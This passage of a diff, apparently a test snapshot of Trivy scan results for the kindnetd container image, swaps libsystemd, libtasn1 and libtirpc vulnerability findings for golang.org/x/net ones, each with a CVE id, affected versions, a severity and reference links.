"https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://bugzilla.redhat.com/2113814", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", - ], - }, - "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", - ], - }, - "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "4.16.0-2+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.16.0-2", - "packageName": "libtasn1-6", + "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-31525", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - "https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "https://access.redhat.com/security/cve/CVE-2021-31525", + "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", + "https://github.com/golang/go/issues/45710", + "https://go.dev/cl/313069", + "https://go.dev/issue/45710", + "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "https://linux.oracle.com/cve/CVE-2021-31525.html", + "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "https://pkg.go.dev/vuln/GO-2022-0236", + "https://security.gentoo.org/glsa/202208-02", + "https://www.cve.org/CVERecord?id=CVE-2021-31525", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", - }, - { - "type": "URL", - "value": "https://bugs.gentoo.org/866237", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-31525", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://access.redhat.com/security/cve/CVE-2021-31525", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "https://github.com/golang/go/issues/45710", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "https://go.dev/cl/313069", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "https://go.dev/issue/45710", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://pkg.go.dev/vuln/GO-2022-0236", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.3.1-1+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46828", - "installedVersion": "1.3.1-1", - "packageName": "libtirpc-common", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - "https://access.redhat.com/errata/RHSA-2022:8400", - "https://access.redhat.com/security/cve/CVE-2021-46828", - "https://bugzilla.redhat.com/2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", - "https://errata.almalinux.org/9/ALSA-2022-8400.html", - "https://errata.rockylinux.org/RLSA-2022:8400", - "https://linux.oracle.com/cve/CVE-2021-46828.html", - "https://linux.oracle.com/errata/ELSA-2022-8400.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", - "https://security.gentoo.org/glsa/202210-33", - "https://security.netapp.com/advisory/ntap-20221007-0004/", - "https://ubuntu.com/security/notices/USN-5538-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46828", - "https://www.debian.org/security/2022/dsa-5200", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtirpc: DoS vulnerability with lots of connections", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46828", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8400", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46828", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2109352", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": 